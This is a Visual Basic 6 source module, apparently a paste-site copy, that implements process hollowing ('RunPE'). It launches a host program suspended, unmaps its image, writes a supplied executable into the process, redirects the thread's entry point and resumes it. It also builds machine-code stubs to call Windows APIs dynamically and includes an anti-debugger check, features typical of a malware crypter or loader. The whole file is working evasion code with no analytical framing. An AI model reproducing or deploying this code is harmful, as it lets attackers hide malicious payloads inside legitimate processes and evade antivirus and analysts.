Option ExplicitPrivate Const CONTEXT_FULL As Long = &H10007Pr

1. Option Explicit
2.  
3. Private Const CONTEXT_FULL              As Long = &H10007
4. Private Const MAX_PATH                  As Integer = 260
5. Private Const CREATE_SUSPENDED          As Long = &H4
6. Private Const MEM_COMMIT                As Long = &H1000
7. Private Const MEM_RESERVE               As Long = &H2000
8. Private Const PAGE_EXECUTE_READWRITE    As Long = &H40
9.  
10. Private Declare Function CreateProcessA Lib "kernel32" (ByVal lpAppName As String, ByVal lpCommandLine As String, ByVal lpProcessAttributes As Long, ByVal lpThreadAttributes As Long, ByVal bInheritHandles As Long, ByVal dwCreationFlags As Long, ByVal lpEnvironment As Long, ByVal lpCurrentDirectory As Long, lpStartupInfo As STARTUPINFO, lpProcessInformation As PROCESS_INFORMATION) As Long
11. Private Declare Function WriteProcessMemory Lib "kernel32" (ByVal hProcess As Long, lpBaseAddress As Any, bvBuff As Any, ByVal nSize As Long, lpNumberOfBytesWritten As Long) As Long
12. Private Declare Function OutputDebugString Lib "kernel32" Alias "OutputDebugStringA" (ByVal lpOutputString As String) As Long
13.  
14. Public Declare Sub RtlMoveMemory Lib "kernel32" (Dest As Any, Src As Any, ByVal L As Long)
15. Private Declare Function CallWindowProcA Lib "user32" (ByVal addr As Long, ByVal p1 As Long, ByVal p2 As Long, ByVal p3 As Long, ByVal p4 As Long) As Long
16. Private Declare Function GetProcAddress Lib "kernel32" (ByVal hModule As Long, ByVal lpProcName As String) As Long
17. Private Declare Function LoadLibraryA Lib "kernel32" (ByVal lpLibFileName As String) As Long
18.  
19. Private Type SECURITY_ATTRIBUTES
20.     nLength As Long
21.     lpSecurityDescriptor As Long
22.     bInheritHandle As Long
23. End Type
24.  
25. Private Type STARTUPINFO
26.     cb As Long
27.     lpReserved As Long
28.     lpDesktop As Long
29.     lpTitle As Long
30.     dwX As Long
31.     dwY As Long
32.     dwXSize As Long
33.     dwYSize As Long
34.     dwXCountChars As Long
35.     dwYCountChars As Long
36.     dwFillAttribute As Long
37.     dwFlags As Long
38.     wShowWindow As Integer
39.     cbReserved2 As Integer
40.     lpReserved2 As Long
41.     hStdInput As Long
42.     hStdOutput As Long
43.     hStdError As Long
44. End Type
45.  
46. Private Type PROCESS_INFORMATION
47.     hProcess As Long
48.     hThread As Long
49.     dwProcessId As Long
50.     dwThreadID As Long
51. End Type
52.  
53. Private Type FLOATING_SAVE_AREA
54.     ControlWord As Long
55.     StatusWord As Long
56.     TagWord As Long
57.     ErrorOffset As Long
58.     ErrorSelector As Long
59.     DataOffset As Long
60.     DataSelector As Long
61.     RegisterArea(1 To 80) As Byte
62.     Cr0NpxState As Long
63. End Type
64.  
65. Private Type CONTEXT
66.     ContextFlags As Long
67.  
68.     Dr0 As Long
69.     Dr1 As Long
70.     Dr2 As Long
71.     Dr3 As Long
72.     Dr6 As Long
73.     Dr7 As Long
74.  
75.     FloatSave As FLOATING_SAVE_AREA
76.     SegGs As Long
77.     SegFs As Long
78.     SegEs As Long
79.     SegDs As Long
80.     Edi As Long
81.     Esi As Long
82.     Ebx As Long
83.     Edx As Long
84.     Ecx As Long
85.     Eax As Long
86.     Ebp As Long
87.     Eip As Long
88.     SegCs As Long
89.     EFlags As Long
90.     Esp As Long
91.     SegSs As Long
92. End Type
93.  
94. Private Type IMAGE_DOS_HEADER
95.     e_magic As Integer
96.     e_cblp As Integer
97.     e_cp As Integer
98.     e_crlc As Integer
99.     e_cparhdr As Integer
100.     e_minalloc As Integer
101.     e_maxalloc As Integer
102.     e_ss As Integer
103.     e_sp As Integer
104.     e_csum As Integer
105.     e_ip As Integer
106.     e_cs As Integer
107.     e_lfarlc As Integer
108.     e_ovno As Integer
109.     e_res(0 To 3) As Integer
110.     e_oemid As Integer
111.     e_oeminfo As Integer
112.     e_res2(0 To 9) As Integer
113.     e_lfanew As Long
114. End Type
115.  
116. Private Type IMAGE_FILE_HEADER
117.     Machine As Integer
118.     NumberOfSections As Integer
119.     TimeDateStamp As Long
120.     PointerToSymbolTable As Long
121.     NumberOfSymbols As Long
122.     SizeOfOptionalHeader As Integer
123.     characteristics As Integer
124. End Type
125.  
126. Private Type IMAGE_DATA_DIRECTORY
127.     VirtualAddress As Long
128.     Size As Long
129. End Type
130.  
131. Private Type IMAGE_OPTIONAL_HEADER
132.     Magic As Integer
133.     MajorLinkerVersion As Byte
134.     MinorLinkerVersion As Byte
135.     SizeOfCode As Long
136.     SizeOfInitializedData As Long
137.     SizeOfUnitializedData As Long
138.     AddressOfEntryPoint As Long
139.     BaseOfCode As Long
140.     BaseOfData As Long
141.     ' NT additional fields.
142.    ImageBase As Long
143.     SectionAlignment As Long
144.     FileAlignment As Long
145.     MajorOperatingSystemVersion As Integer
146.     MinorOperatingSystemVersion As Integer
147.     MajorImageVersion As Integer
148.     MinorImageVersion As Integer
149.     MajorSubsystemVersion As Integer
150.     MinorSubsystemVersion As Integer
151.     W32VersionValue As Long
152.     SizeOfImage As Long
153.     SizeOfHeaders As Long
154.     CheckSum As Long
155.     SubSystem As Integer
156.     DllCharacteristics As Integer
157.     SizeOfStackReserve As Long
158.     SizeOfStackCommit As Long
159.     SizeOfHeapReserve As Long
160.     SizeOfHeapCommit As Long
161.     LoaderFlags As Long
162.     NumberOfRvaAndSizes As Long
163.     DataDirectory(0 To 15) As IMAGE_DATA_DIRECTORY
164. End Type
165.  
166. Private Type IMAGE_NT_HEADERS
167.     Signature As Long
168.     FileHeader As IMAGE_FILE_HEADER
169.     OptionalHeader As IMAGE_OPTIONAL_HEADER
170. End Type
171.  
172. Private Type IMAGE_SECTION_HEADER
173.     SecName As String * 8
174.     VirtualSize As Long
175.     VirtualAddress  As Long
176.     SizeOfRawData As Long
177.     PointerToRawData As Long
178.     PointerToRelocations As Long
179.     PointerToLinenumbers As Long
180.     NumberOfRelocations As Integer
181.     NumberOfLinenumbers As Integer
182.     characteristics  As Long
183. End Type
184.  
185. Public Function IsDebuggerActive() As Boolean
186. IsDebuggerActive = Not (OutputDebugString(VarPtr(ByVal "=)")) = 1)
187. End Function
188. Private Function CallAPI(ByVal sLib As String, ByVal sMod As String, ParamArray Params()) As Long
189.     Dim lPtr                As Long
190.     Dim bvASM(&HEC00& - 1)  As Byte
191.     Dim i                   As Long
192.     Dim lMod                As Long
193.    
194.     lMod = GetProcAddress(LoadLibraryA(sLib), sMod)
195.     If lMod = 0 Then Exit Function
196.    
197.     lPtr = VarPtr(bvASM(0))
198.     RtlMoveMemory ByVal lPtr, &H59595958, &H4:              lPtr = lPtr + 4
199.     RtlMoveMemory ByVal lPtr, &H5059, &H2:                  lPtr = lPtr + 2
200.     For i = UBound(Params) To 0 Step -1
201.         RtlMoveMemory ByVal lPtr, &H68, &H1:                lPtr = lPtr + 1
202.         RtlMoveMemory ByVal lPtr, CLng(Params(i)), &H4:     lPtr = lPtr + 4
203.     Next
204.     RtlMoveMemory ByVal lPtr, &HE8, &H1:                    lPtr = lPtr + 1
205.     RtlMoveMemory ByVal lPtr, lMod - lPtr - 4, &H4:         lPtr = lPtr + 4
206.     RtlMoveMemory ByVal lPtr, &HC3, &H1:                    lPtr = lPtr + 1
207.     CallAPI = CallWindowProcA(VarPtr(bvASM(0)), 0, 0, 0, 0)
208. End Function
209.  
210. Sub Injec(ByVal sHost As String, ByRef bvBuff() As Byte, parameter As String)
211.     Dim i       As Long
212.     Dim Pidh    As IMAGE_DOS_HEADER
213.     Dim Pinh    As IMAGE_NT_HEADERS
214.     Dim Pish    As IMAGE_SECTION_HEADER
215.     Dim Si      As STARTUPINFO
216.     Dim Pi      As PROCESS_INFORMATION
217.     Dim Ctx     As CONTEXT
218.  
219.     Si.cb = Len(Si)
220.  
221.     RtlMoveMemory Pidh, bvBuff(0), 64
222.     RtlMoveMemory Pinh, bvBuff(Pidh.e_lfanew), 248
223.    
224.     CreateProcessA sHost, " " & parameter, 0, 0, False, CREATE_SUSPENDED, 0, 0, Si, Pi
225.     CallAPI "ntdll", "NtUnmapViewOfSection", Pi.hProcess, Pinh.OptionalHeader.ImageBase
226.     CallAPI "kernel32", "VirtualAllocEx", Pi.hProcess, Pinh.OptionalHeader.ImageBase, Pinh.OptionalHeader.SizeOfImage, MEM_COMMIT Or MEM_RESERVE, PAGE_EXECUTE_READWRITE
227.     WriteProcessMemory Pi.hProcess, ByVal Pinh.OptionalHeader.ImageBase, bvBuff(0), Pinh.OptionalHeader.SizeOfHeaders, 0
228.  
229.     For i = 0 To Pinh.FileHeader.NumberOfSections - 1
230.         RtlMoveMemory Pish, bvBuff(Pidh.e_lfanew + 248 + 40 * i), Len(Pish)
231.         WriteProcessMemory Pi.hProcess, ByVal Pinh.OptionalHeader.ImageBase + Pish.VirtualAddress, bvBuff(Pish.PointerToRawData), Pish.SizeOfRawData, 0
232.     Next i
233.  
234.     Ctx.ContextFlags = CONTEXT_FULL
235.     CallAPI "kernel32", "GetThreadContext", Pi.hThread, VarPtr(Ctx)
236.     WriteProcessMemory Pi.hProcess, ByVal Ctx.Ebx + 8, Pinh.OptionalHeader.ImageBase, 4, 0
237.     Ctx.Eax = Pinh.OptionalHeader.ImageBase + Pinh.OptionalHeader.AddressOfEntryPoint
238.     CallAPI "kernel32", "SetThreadContext", Pi.hThread, VarPtr(Ctx)
239.     CallAPI "kernel32", "ResumeThread", Pi.hThread
240. End Sub
241.  
242. Public Function StrToBytArray(ByVal sStr As String) As Byte()
243. Dim i As Long
244. Dim Buffer() As Byte
245.     ReDim Buffer(Len(sStr) - 1)
246.     For i = 1 To Len(sStr)
247.         Buffer(i - 1) = Asc(Mid(sStr, i, 1))
248.     Next i
249.     StrToBytArray = Buffer
250. End Function
251.  
252. Public Function ThisExe() As String
253.     Dim lRet        As Long
254.     Dim bvBuff(255) As Byte
255.     lRet = CallAPI("kernel32", "GetModuleFileNameA", App.hInstance, VarPtr(bvBuff(0)), 256)
256.     ThisExe = Left$(StrConv(bvBuff, vbUnicode), lRet)
257. End Function